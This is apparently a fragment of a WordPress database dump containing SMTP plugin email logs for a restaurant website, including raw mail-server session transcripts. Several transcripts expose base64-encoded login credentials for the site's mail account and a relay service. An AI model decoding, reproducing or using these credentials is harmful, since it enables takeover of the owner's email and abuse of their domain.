J\r\n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\r\njCK1tq2hrlmhxs7m2iZbi7W2ud3cYK3qaFMUVDa35dfWdTRVtiJyrAPKA7VOaCwS0/8Cubi2\r\nta3B1qyIDIuI+DU2+nMRySclWOVq8C+UpBAbaSF20koaSB2pJ+1EQaLwPhGJtZCCVOGM4p/W\r\nKFAvtaRNwG/GkdoJ2YytSaBmxV4zUjIjjhVpdCC2ghSQSoSideNsHcKacNzqpBx7H64LU/tP\r\nuLFOzvT/EnYxjloFPm0Cn5EkDFdH/Ctr/w90nlXSCmVuZHN0cmVhbQplbmRvYmoKNTMgMCBv\r\nYmoKNDE0MgplbmRvYmoKNTEgMCBvYmoKPDwgL1R5cGUgL0ZvbnQKL1N1YnR5cGUgL0NJREZv\r\nbnRUeXBlMgovQmFzZUZvbnQgL05pbWJ1c1NhbnMtUmVndWxhcgovQ0lEU3lzdGVtSW5mbyA8\r\nPCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKElkZW50aXR5KSAvU3VwcGxlbWVudCAw\r\nID4+Ci9Gb250RGVzY3JpcHRvciA0OSAwIFIKL0NJRFRvR0lETWFwIC9JZGVudGl0eQovVyBb\r\nMCBbMjc2IDcxNiA1NTIgNTUyIDU1MiAyNzYgNTUyIDIyMCAyMjAgNDk2IDMzMCA0OTYgNTUy\r\nIDU1MiAzMzAgNTUyIDY2MiA3MTYgNTUyIDU1MiA2MDYgNDk2IDQ5NiA1NTIgNzE2IDgyNiA1\r\nNTIgNTUyIDU1MiA1NTIgNTUyIDMzMCA2NjIgNDk2IDI3NiAyNzYgNTUyIDMzMCA2MDYgMjc2\r\nIDE4OSA1NTIgNTUyIDY2MiBdCl0KPj4KZW5kb2JqCjUyIDAgb2JqCjw8IC9MZW5ndGggNjY1\r\nID4+CnN0cmVhbQovQ0lESW5pdCAvUHJvY1NldCBmaW5kcmVzb3VyY2UgYmVnaW4KMTIgZGlj\r\ndCBiZWdpbgpiZWdpbmNtYXAKL0NJRFN5c3RlbUluZm8gPDwgL1JlZ2lzdHJ5IChBZG9iZSkg\r\nL09yZGVyaW5nIChVQ1MpIC9TdXBwbGVtZW50IDAgPj4gZGVmCi9DTWFwTmFtZSAvQWRvYmUt\r\nSWRlbnRpdHktVUNTIGRlZgovQ01hcFR5cGUgMiBkZWYKMSBiZWdpbmNvZGVzcGFjZXJhbmdl\r\nCjwwMDAwPiA8RkZGRj4KZW5kY29kZXNwYWNlcmFuZ2UKMiBiZWdpbmJmcmFuZ2UKPDAwMDA+\r\nIDwwMDAwPiA8MDAwMD4KPDAwMDE+IDwwMDJCPiBbPDAwNDM+IDwwMDY1PiA8MDA2RT4gPDAw\r\nNjE+IDwwMDIwPiA8MDA2ND4gPDAwNkM+IDwwMDY5PiA8MDA3Nj4gPDAwNzI+IDwwMDc5PiA8\r\nMDAzMj4gPDAwMzg+IDwwMDJEPiA8MDAzMT4gPDAwNTY+IDwwMDU1PiA8MDA2Nz4gPDAwNkY+\r\nIDwwMDQ2PiA8MDA3Mz4gPDAwNjM+IDwwMDM3PiA8MDA1Mj4gPDAwNkQ+IDwwMDM0PiA8MDAz\r\nOT4gPDAwMzM+IDwwMDMwPiA8MDAzNj4gPDAwMjg+IDwwMDUzPiA8MDA3QT4gPDAwMkU+IDww\r\nMDJGPiA8MDAzNT4gPDAwMjk+IDwwMDU0PiA8MDA3ND4gPDAwMjc+IDwwMDc1PiA8MDA3MD4g\r\nPDAwNDI+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9DTWFw\r\nIGRlZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjE4IDAgb2Jq\r\nCjw8IC9UeXBlIC9Gb250Ci9TdWJ0eXBlIC9UeXBlMAovQmFzZUZvbnQgL05pbWJ1c1NhbnMt\r\nUmVndWxhcgovRW5jb2RpbmcgL0lkZW50aXR5LUgKL0Rlc2NlbmRhbnRGb250cyBbNTEgMCBS\r\nXQovVG9Vbmljb2RlIDUyIDAgUj4+CmVuZG9iagoyIDAgb2JqCjw8Ci9UeXBlIC9QYWdlcwov\r\nS2lkcyAKWwo1IDAgUgpdCi9Db3VudCAxCi9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFnZUIg\r\nL0ltYWdlQ10KPj4KZW5kb2JqCnhyZWYKMCA1NAowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAw\r\nMDAwMDkgMDAwMDAgbiAKMDAwMDIxNzQwMiAwMDAwMCBuIAowMDAwMDAwMTYzIDAwMDAwIG4g\r\nCjAwMDAwMDAyNTggMDAwMDAgbiAKMDAwMDE5NzY4NSAwMDAwMCBuIAowMDAwMjA5MTQ2IDAw\r\nMDAwIG4gCjAwMDAyMTE1MzggMDAwMDAgbiAKMDAwMDAwMDI5NSAwMDAwMCBuIAowMDAwMDAx\r\nODkxIDAwMDAwIG4gCjAwMDAwMDE5MTEgMDAwMDAgbiAKMDAwMDAxMzYwOSAwMDAwMCBuIAow\r\nMDAwMDEzNjMxIDAwMDAwIG4gCjAwMDAwMTU0MDMgMDAwMDAgbiAKMDAwMDAxNTQyNCAwMDAw\r\nMCBuIAowMDAwMDE3MzE0IDAwMDAwIG4gCjAwMDAwMTczMzUgMDAwMDAgbiAKMDAwMDE5NDY3\r\nNyAwMDAwMCBuIAowMDAwMjE3MjU3IDAwMDAwIG4gCjAwMDAyMDI4MzUgMDAwMDAgbiAKMDAw\r\nMDE5NDcwMCAwMDAwMCBuIAowMDAwMTk2OTA5IDAwMDAwIG4gCjAwMDAxOTY5MzAgMDAwMDAg\r\nbiAKMDAwMDE5Njk3NSAwMDAwMCBuIAowMDAwMTk3MDI3IDAwMDAwIG4gCjAwMDAxOTcyMjAg\r\nMDAwMDAgbiAKMDAwMDE5NzUxOCAwMDAwMCBuIAowMDAwMTk3Mjg0IDAwMDAwIG4gCjAwMDAx\r\nOTczOTQgMDAwMDAgbiAKMDAwMDE5NzU4MSAwMDAwMCBuIAowMDAwMTk4MDg2IDAwMDAwIG4g\r\nCjAwMDAxOTk2NDQgMDAwMDAgbiAKMDAwMDE5NzgwNyAwMDAwMCBuIAowMDAwMTk4MDU5IDAw\r\nMDAwIG4gCjAwMDAxOTk2NjUgMDAwMDAgbiAKMDAwMDE5OTg3NSAwMDAwMCBuIAowMDAwMjAy\r\nMDM1IDAwMDAwIG4gCjAwMDAyMDIzMTQgMDAwMDAgbiAKMDAwMDIwMjAxNCAwMDAwMCBuIAow\r\nMDAwMjAyOTc3IDAwMDAwIG4gCjAwMDAyMDMyMzcgMDAwMDAgbiAKMDAwMDIwODM5NSAwMDAw\r\nMCBuIAowMDAwMjA4NjUzIDAwMDAwIG4gCjAwMDAyMDgzNzQgMDAwMDAgbiAKMDAwMDIwOTI4\r\nMiAwMDAwMCBuIAowMDAwMjA5NTQ3IDAwMDAwIG4gCjAwMDAyMTA4OTUgMDAwMDAgbiAKMDAw\r\nMDIxMTExOCAwMDAwMCBuIAowMDAwMjEwODc0IDAwMDAwIG4gCjAwMDAyMTE2NzkgMDAwMDAg\r\nbiAKMDAwMDIxMTg5MiAwMDAwMCBuIAowMDAwMjE2MTQ2IDAwMDAwIG4gCjAwMDAyMTY1NDAg\r\nMDAwMDAgbiAKMDAwMDIxNjEyNSAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDU0Ci9JbmZv\r\nIDEgMCBSCi9Sb290IDI5IDAgUgo+PgpzdGFydHhyZWYKMjE3NTAwCiUlRU9GCg==\r\n--=_4c54f9b25076faf82def9aff06fb17e1--\r\n.\r\n250 OK id=1kj1D9-0008G8-6Z\r\n'),(22904,1257,'mwb_wgm_order_giftcard','send'),(22905,1265,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22906,1265,'success',''),(22907,1265,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22908,1265,'to_header','webmaster@baldisserri.com'),(22909,1265,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22910,1265,'original_to','webmaster@baldisserri.com'),(22911,1265,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22912,1265,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.4\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22913,1265,'original_headers',''),(22914,1265,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 02 Dec 2020 07:22:37 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22915,1266,'solution','Not found, check status column for more info.'),(22916,1266,'success','1'),(22917,1266,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22918,1266,'to_header','webmaster@baldisserri.com'),(22919,1266,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22920,1266,'original_to','webmaster@baldisserri.com'),(22921,1266,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22922,1266,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.4\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22923,1266,'original_headers',''),(22924,1266,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 02 Dec 2020 07:22:39 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <15d57febe253c21d503d2397b34084a1@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Wed, 02 Dec 2020 12:22:39 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Yoas=\r\nt SEO version 15.4=0A=0A=0AIf you experience any issues or need support,=\r\n the volunteers in the WordPress.org support forums may be able to help.=\r\n=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kkR9b-0008Tu-DL\r\n'),(22925,1267,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22926,1267,'success',''),(22927,1267,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22928,1267,'to_header','webmaster@baldisserri.com'),(22929,1267,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22930,1267,'original_to','webmaster@baldisserri.com'),(22931,1267,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22932,1267,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed version 2.6.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22933,1267,'original_headers',''),(22934,1267,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 04 Dec 2020 19:22:32 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22935,1268,'solution','Not found, check status column for more info.'),(22936,1268,'success','1'),(22937,1268,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22938,1268,'to_header','webmaster@baldisserri.com'),(22939,1268,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22940,1268,'original_to','webmaster@baldisserri.com'),(22941,1268,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22942,1268,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed version 2.6.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22943,1268,'original_headers',''),(22944,1268,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 04 Dec 2020 19:22:34 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <6e2a6b5ed191d660f3e28954cb6b4220@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Sat, 05 Dec 2020 00:22:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Smas=\r\nh Balloon Instagram Feed version 2.6.1=0A=0A=0AIf you experience any iss=\r\nues or need support, the volunteers in the WordPress.org support forums=\r\n may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe W=\r\nordPress Team\r\n.\r\n250 OK id=1klLLO-0003U0-Fq\r\n'),(52067,4351,'_menu_item_xfn',''),(52030,2986,'_wp_attachment_image_alt','g'),(52031,4348,'_menu_item_type','custom'),(52032,4348,'_menu_item_menu_item_parent','0'),(52033,4348,'_menu_item_object_id','4348'),(52034,4348,'_menu_item_object','custom'),(52035,4348,'_menu_item_target',''),(52036,4348,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52037,4348,'_menu_item_xfn',''),(52038,4348,'_menu_item_url','#'),(52039,4348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52040,4348,'_menu_item_icon','null'),(52041,4349,'_menu_item_type','custom'),(52042,4349,'_menu_item_menu_item_parent','0'),(52043,4349,'_menu_item_object_id','4349'),(52044,4349,'_menu_item_object','custom'),(52045,4349,'_menu_item_target',''),(52046,4349,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52047,4349,'_menu_item_xfn',''),(52048,4349,'_menu_item_url','#'),(52049,4349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52050,4349,'_menu_item_icon','null'),(52051,4350,'_menu_item_type','custom'),(52052,4350,'_menu_item_menu_item_parent','0'),(52053,4350,'_menu_item_object_id','4350'),(52054,4350,'_menu_item_object','custom'),(52055,4350,'_menu_item_target',''),(52056,4350,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52057,4350,'_menu_item_xfn',''),(52058,4350,'_menu_item_url','#'),(52059,4350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52060,4350,'_menu_item_icon','null'),(52061,4351,'_menu_item_type','custom'),(52062,4351,'_menu_item_menu_item_parent','0'),(52063,4351,'_menu_item_object_id','4351'),(52064,4351,'_menu_item_object','custom'),(52065,4351,'_menu_item_target',''),(52066,4351,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37633,3696,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(51991,2949,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2018/09/landing-img-5-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s: